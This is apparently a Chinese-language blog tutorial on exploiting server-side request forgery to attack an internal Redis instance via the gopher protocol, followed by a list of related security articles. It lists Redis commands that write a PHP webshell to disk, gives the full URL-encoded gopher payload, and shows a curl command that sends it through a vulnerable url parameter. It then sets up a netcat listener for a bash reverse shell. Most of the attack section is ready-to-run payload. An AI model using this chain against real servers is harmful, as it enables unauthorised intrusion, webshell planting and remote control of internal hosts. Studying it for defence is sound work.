利用SSRF漏洞內網探測來攻擊Redis(通過curl命令 & gopher協議)
有時候有些漏洞不存在與Get請求中,此時Header CRLF方法就不行了,下面給出第二種方式
Gopher協議支援發出GET、POST請求:可以先攔截get請求包和post請求包,再構造成符合Gopher協議的請求(利用BP)。gopher協議是ssrf利用中一個最強大的協議。
可以攻擊內網的 FTP、Telnet、Redis、Memcache,也可以進行 GET、POST 請求,還可以攻擊內網未授權MySQL。
gopher 協議的精髓就在於可以在特定的埠上進行相關命令的執行。
Gopher協議的優勢在於可以傳送多種格式的資料包,這是就存在很大的利用空間。
gopher協議+ curl命令偽造POST請求包發給內網主機(已經掃到)。
gopher協議支援發出GET、POST請求:可以先攔截get請求包和post請求包,再構造成符合gopher協議的請求。gopher協議是ssrf利用中一個最強大的協議(俗稱萬能協議)。
可以攻擊內網的 FTP、Telnet、Redis、Memcache,也可以進行 GET、POST 請求,還可以攻擊內網未授權MySQL。
gopher://IP:port/_{TCP/IP data stream}
redis.cmd檔案為需要執行的redis命令,一行一條命令(寫入換行符)
例如下列操作
flushall
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save
轉換成payload後就是
%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a
然後利用curl命令
curl -v 'http://xxx.xxx.xx.xx/xx.php?url=gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a
照例進行bash反彈shell
傳送請求之前在公網機開啟nc監聽埠2333,後續步驟類似前一種方式。
相關文章
- SSRF之利用dict和gopher吊打RedisGoRedis
- TLS 1.2 協議現漏洞 ,POODLE攻擊捲土重來TLS協議
- 什麼是SSRF攻擊?如何防禦SSRF攻擊?
- 網路安全學習階段性總結:SQL隱碼攻擊|SSRF攻擊|OS命令注入|身份驗證漏洞|事物邏輯漏洞|目錄遍歷漏洞SQL
- 網路層協議及ARP攻擊協議
- gopher 協議初探Go協議
- 利用PHAR協議進行PHP反序列化攻擊協議PHP
- 通過命令curl 操作ElasticSearch指南Elasticsearch
- 什麼是SSRF攻擊?SSRF用途是什麼?
- Redis 通訊協議Redis協議
- 黑客通過VPN攻擊知名防毒工具,破壞內部網路黑客防毒
- User-Agent手工注入攻擊及防禦(探測與利用分析)
- 怎麼解決網站被DDOS攻擊 利用7層協議進行防禦網站協議
- TCP/IP協議的SYN攻擊TCP協議
- SSRF 攻擊是如何發生的?
- Redis漏洞攻擊植入木馬逆向分析Redis
- ARP協議介紹與ARP協議的攻擊手法協議
- 通過故事引申網路協議TCP協議TCP
- 如何使用Linux命令來防禦網路攻擊?Linux
- 網站漏洞檢測工具對CSRF攻擊詳情網站
- 用 Go 來了解一下 Redis 通訊協議GoRedis協議
- 通過ICMP協議反彈SHELL並執行命令協議
- 攻擊不斷!QNAP 警告利用0day漏洞Deadbolt 勒索軟體攻擊
- 滲透&&探測 (之DNS協議)DNS協議
- Raft協議:通過TermId大的通過Raft協議
- 協議層的攻擊:HTTP請求走私協議HTTP
- 滲透測試學習之探測和攻擊無線網路五
- 滲透測試學習之探測和攻擊無線網路六
- 滲透測試學習之探測和攻擊無線網路八
- 滲透測試學習之探測和攻擊無線網路九
- 滲透測試學習之探測和攻擊無線網路十
- 滲透測試學習之探測和攻擊無線網路十一
- 滲透測試學習之探測和攻擊無線網路一
- 滲透測試學習之探測和攻擊無線網路二
- 滲透測試學習之探測和攻擊無線網路三
- 滲透測試學習之探測和攻擊無線網路四
- 網站被攻擊怎麼辦 如何查詢網站漏洞攻擊源網站
- XSSI攻擊利用